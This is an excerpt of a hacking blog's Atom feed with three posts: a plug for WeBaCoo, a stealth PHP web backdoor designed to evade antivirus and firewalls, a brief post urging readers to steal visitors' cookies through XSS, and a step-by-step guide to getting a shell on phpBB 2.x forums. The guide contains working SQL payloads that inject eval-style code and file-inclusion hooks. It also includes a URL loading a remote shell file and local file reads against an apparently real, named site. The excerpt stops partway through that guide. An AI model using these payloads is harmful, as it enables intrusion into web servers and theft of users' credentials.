src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-8118982240593102274</id><published>2012-02-01T15:53:00.002+06:00</published><updated>2012-02-01T15:53:51.673+06:00</updated><title type='text'>WeBaCoo v.0.2.2</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server.&lt;/span&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute commands to the compromised server. The obfuscated communication is accomplished using HTTP header’s Cookie fields under valid client HTTP requests and relative web server’s responses.&lt;/span&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;The script-kit has two main operation modes: Generation and “Terminal”. Using generation mode, user can create the backdoor code containing the PHP payloads. On the other hand, at the remote “terminal” mode the client can connect to the compromised server where the backdoor PHP code has been injected. In order to establish the remote “pseudo”-shell, the user must provide the server’s URL path containing the injected code.&lt;/span&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;b style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;Video:&lt;/b&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.securitytube.net/video/2731" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.securitytube.net/video/2731&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;b style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;Site:&lt;/b&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="https://bechtsoudis.com/webacoo/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;https://bechtsoudis.com/webacoo/&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;b style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;Download:&lt;/b&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="https://github.com/anestisb/WeBaCoo/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;https://github.com/anestisb/WeBaCoo/&lt;/a&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-8118982240593102274?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/8118982240593102274/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/webacoo-v022.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/8118982240593102274'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/8118982240593102274'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/webacoo-v022.html' title='WeBaCoo v.0.2.2'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-7984578397124637516</id><published>2012-02-01T12:22:00.002+06:00</published><updated>2012-02-01T12:22:20.811+06:00</updated><title type='text'>xss tutorial</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div class="post_body" id="pid_17195673" style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"&gt;this is a awesome xss tutorial. (the sad part is we do not see codes.)&lt;br /&gt;maybe in future when i posted all kinds of sqli.&lt;br /&gt;i will post a thread on xss to.&lt;br /&gt;&lt;br /&gt;lissen good at what you all can do.&lt;br /&gt;you can steal cookies from the site visitors.&lt;br /&gt;but cookies do not only include the site cookie.&lt;br /&gt;you could get his facebook cookie and more.&lt;br /&gt;&lt;br /&gt;or you could make a session expired error which asks visitors to enter their password.&lt;br /&gt;&lt;br /&gt;&lt;object height="385" width="640"&gt;&lt;embed src="http://www.youtube.com/v/2jBpex0xqEY" type="application/x-shockwave-flash" width="640" height="385"&gt;&lt;/object&gt;&lt;/div&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-7984578397124637516?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/7984578397124637516/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/xss-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/7984578397124637516'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/7984578397124637516'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/xss-tutorial.html' title='xss tutorial'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-5203377303171835808</id><published>2012-02-01T12:16:00.003+06:00</published><updated>2012-02-01T12:19:47.452+06:00</updated><title type='text'>Shelling phpBB ----&gt; 2.x.x Remote Code Execution</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Today I'm going to be showing you how to get your shell uploaded on phpBB --&amp;gt; 2.x.x&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;Checking The Server Configuration&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;It's a shorter process then shelling phpBB3 forums, depending on what the server configuration is....&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Once you've got your admin access, log into the admin panel and open up notepad.&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;On the left, you will see restore database.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: 9v4gX.jpg]" border="0" height="173" src="http://i.imgur.com/9v4gX.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="320" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;It should take you to a page that looks like this...&lt;/span&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: PFukB.jpg]" border="0" height="54" src="http://i.imgur.com/PFukB.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="320" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now paste this in notepad, and save it as exploit.SQL&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo();' WHERE user_id=YOUR_USER_ID;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;In my case, my user id is 2. Also, your table name might not always be phpbb_users. You can guess it if you don't know it..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now upload your exploit.SQL file in the restore database page, and click start restore.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Database Utilities : Restore&lt;br /&gt;The Database has been successfully restored.&lt;br /&gt;&lt;br /&gt;Your board should be back to the state it was when the backup was made.&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: KVyzH.jpg]" border="0" height="173" src="http://i.imgur.com/KVyzH.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="320" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now click on Forum Index on the left, and click profile.&lt;/span&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: us07S.jpg]" border="0" src="http://i.imgur.com/us07S.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now the PHP Information should be displayed on the page. This is important, it shows what limits you, and what commands you can execute.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: uxhKJ.jpg]" border="0" height="173" src="http://i.imgur.com/uxhKJ.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="320" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;On my site, allow_url_fopen and allow_url_include are set to on. This means I can include a local file, or a remote file depending on what functions are disabled on the server.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;If you can use either of these methods, you can create a Local/Remote File Inlcusion vulnerability on the web page.&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Here are some examples of LFI and RFI..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;Remote File Inclusion&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include($_GET[RFI])' WHERE user_id=2;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Go back to your restore database file, and re upload your exploit and repeat the same process...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Warning: include() [function.include]: Filename cannot be empty in /home/timwan/public_html/messageboard/includes/usercp_register.php(814) : regexp code on line 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now you select your remote file like this when you load the webpage..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://passfailstudios.com/messageboard/profile.php?mode=editprofile&amp;amp;RFI=http://site.com/shell.txt?&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: n30RY.jpg]" border="0" height="173" src="http://i.imgur.com/n30RY.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="320" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;You can use the same thing, and use local files to exploit the vulnerability.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;Local File Inlcusion&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include($_GET[LFI])' WHERE user_id=2;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://passfailstudios.com/messageboard/profile.php?mode=editprofile&amp;amp;LFI=/proc/self/status&lt;br /&gt;&lt;br /&gt;Name: php State: R (running) Tgid: 4517 Pid: 4517 PPid: 2788 TracerPid: 0 Uid: 32264 32264 32264 32264 Gid: 32266 32266 32266 32266 FDSize: 4096 Groups: 32266 VmPeak: 36068 kB VmSize: 36068 kB VmLck: 0 kB VmHWM: 14768 kB VmRSS: 14768 kB VmData: 5108 kB VmStk: 136 kB VmExe: 6520 kB VmLib: 22788 kB VmPTE: 112 kB VmSwap: 0 kB Threads: 1 SigQ: 0/96476 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: fffffffe3bfbe007 SigIgn: 0000000000001000 SigCgt: 0000000184000000 CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: ffffffffffffffff Cpus_allowed: 0004 Cpus_allowed_list: 2 voluntary_ctxt_switches: 11 nonvoluntary_ctxt_switches: 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: dv83e.jpg]" border="0" height="173" src="http://i.imgur.com/dv83e.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="320" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now you could exploit through the process environment file, logs, or whatever else depending on what you have permissions to, or if a firewall is installed. Unforunately for me, this site has a hell of an annoying WAF.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;Remote Code Execution&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now, if any of these are disabled, you're going to have some trouble. If not, we can move on to RCE through our SQL query.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;system&lt;br /&gt;exec&lt;br /&gt;shell_exec&lt;br /&gt;passthru&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now you can do something like this depending on whether the site has magic quotes enabled or not.&lt;/span&gt;&lt;br 